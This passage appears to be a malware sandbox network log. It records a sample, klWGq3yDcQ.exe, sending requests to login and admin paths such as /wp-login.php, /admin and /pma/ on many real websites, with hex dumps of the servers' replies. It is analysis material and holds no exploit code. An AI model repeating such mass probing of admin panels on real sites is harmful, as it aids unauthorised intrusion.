                                                                                                                                                                                                    2023-11-26 05:59:43 UTC922INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 33 2e 36 33 31 31 30 33 35 34 32 35 34 30 32 36 31 32 38 35 36 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 53 65 72 76 65 72 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978383.6311035425402612856Cache-Control: public,max-age=0,must-revalidateServer:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1252INData Raw: 5d 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 61 6e 67 75 6c 61 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e
                                                                                                                                                                                                    Data Ascii: ]--><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/angular.min.js"></script> ... --><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC361INData Raw: 2d 62 72 6f 77 73 65 72 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 68 65 61 64 65 72 22 3e 45 72 72 6f 72 20 34 30 34 2d 4e 6f 74 42 72 61 6e 64 65 64 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73
                                                                                                                                                                                                    Data Ascii: -browser-wrapper"> <h1 class="non-angular-supported-browser-header">Error 404-NotBranded occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your brows


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    403192.168.2.45001413.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC172OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:43 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    404192.168.2.45013434.208.26.1524436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC170OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: micro-design.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC411INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 31 35 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6d 69 63 72 6f 2d 64 65 73 69 67 6e 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: ApacheX-Powered-By: PHP/7.4.15Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://micro-design.com/wp-json/>; rel="https://api
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC8192INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><script>win
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC8192INData Raw: 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 32 32 32 32 32 32 32 32 32 32 32 32 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 36 36 36 36 36 36 36 36 36 36 36 37 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 38 38 38 38 38 38 38 38 38 38 38 39 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ntent h1{font-size:40px;font-size:2.2222222222222rem;line-height:1.4em;}h2,.entry-content h2{font-size:30px;font-size:1.6666666666667rem;line-height:1.25em;}h3,.entry-content h3{font-size:25px;font-size:1.3888888888889rem;line-height:1.2em;}h4,.entry-cont
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC6INData Raw: 32 30 30 30 0d 0a
                                                                                                                                                                                                    Data Ascii: 2000
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC8192INData Raw: 2e 35 65 6d 20 31 2e 35 65 6d 3b 6d 61 72 67 69 6e 3a 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 2d 63 6f 6e 74 65 6e 74 20 2e 63 61 72 74 5f 69 74 65 6d 2e 65 64 64 5f 63 68 65 63 6b 6f 75 74 20 7b 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 31 2e 35 65 6d 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 7d 2e 61 73 74 72 61 2d 63 61 72 74 2d 64 72 61 77 65 72 20 2e 77 69 64 67 65 74 5f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 5f 63 6f 6e 74 65 6e 74 20 3e 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 5f 5f 65 6d 70 74 79 2d 6d 65 73 73 61 67 65
                                                                                                                                                                                                    Data Ascii: .5em 1.5em;margin: 0;text-align: center;}.astra-cart-drawer .astra-cart-drawer-content .cart_item.edd_checkout {padding: 1em 1.5em 0;text-align: center;margin-top: 0;}.astra-cart-drawer .widget_shopping_cart_content > .woocommerce-mini-cart__empty-message
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    405192.168.2.4494523.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC1099INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6a 46 56 51 55 6c 4f 55 30 4a 4e 4f 45 6b 76 55 44 42 45 4b 79 74 55 52 6b 4e 35 56 30 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 55 6c 6c 43 4e 47 6b 34 57 48 46 32 61 54 6c 6f 55 6a 4a 70 5a 48 42 6d 53 7a 5a 48 55 30 52 5a 4d 57 52 48 59 6d 59 31 65 45 64 57 64 31 41 78 52 46 6c 56 5a 54 64 35 52 56 70 6a 54 58 45 34 62 45 39 50 52 6b 74 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:44 GMTServer: ApacheCache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IjFVQUlOU0JNOEkvUDBEKytURkN5V0E9PSIsInZhbHVlIjoiUllCNGk4WHF2aTloUjJpZHBmSzZHU0RZMWRHYmY1eEdWd1AxRFlVZTd5RVpjTXE4bE9PRktr


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    406192.168.2.449815159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    407192.168.2.449427120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC960OUTGET /login/?page=%2Fadministrator%2Findex.php HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://login.microsoftonline.com/c8f4395e-fa4e-4196-adb9-ba2cd2ca09f0/saml2?SAMLRequest=fZJRb9owFIXf%2BRVV3uM4CaGJBUisrC0SA1TYHvYyXeybYsmxU9tpx79fiLd1mzTu4%2FE9n8498tRBo1q26PxJP%2BFLh86Pbvr53ijt2PA4izqrmQEnHdPQoGOes%2F3i05plhLLWGm%2B4UdE%2FtusucA6tl0YH22o5i7abj%2Bvtw2rzbZJCxbEu6FHc5hWnNE2xHFdlWRcgUBR5QUHkcBusX9C6njOLemw0CjTnOlxp50H7XqdZHqdpnE0OtGBFxfLya7Au%2B2OlBj%2FYT963jiWJMs9Sk0Zya5ypvdFKaiTcNAkv63FeFRjXMMZ4nFaTGMSxio%2BQcZFxoFVNk8vpWcDvfjbzQWoh9fP1Qo5hybHHw2EX77b7Q4AsfhV1Z7TrGrR7tK%2BS4%2Ben9Xvm5kw4qFewZ%2FKiBEHREeiGKAkPNtKe2mg%2BEKcXnQ0d2flVwjT5c%2FXd3LJNn3%2B13Bkl%2BXnQL3NvbAP%2B%2F2emJB0UKeJ6WGWddi1yWUsU0W%2FMQinzdmcRPM4ibzuMbpL5KGT5%2B6POfwA%3D&RelayState=%2Fadministrator%2F
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 05:59:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 05:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    408192.168.2.450255162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    409192.168.2.45033154.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC174OUTGET /admin/pages/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC511INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 39 30 71 64 65 66 35 61 75 31 39 66 6e 72 6f 6d 67 64 75 69 70 63 75 38 73 35 3b 20 70 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 53 65 63 75 72 69 74 79 2f 6c 6f 67 69 6e 3f 42 61 63 6b 55 52 4c 3d 25 32 46 61 64 6d 69 6e 25 32 46 70 61 67 65 73 25 32 46 0d 0a 78 2d 63 6f 6e 74 72 6f 6c 6c 65 72 3a 20 53 69 6c 76 65 72 53 74 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:43 GMTServer: Apache/2.4.52 (Ubuntu)Set-Cookie: PHPSESSID=90qdef5au19fnromgduipcu8s5; path=/; HttpOnlylocation: https://ce-logic.com/Security/login?BackURL=%2Fadmin%2Fpages%2Fx-controller: SilverStr


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    410192.168.2.45066613.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
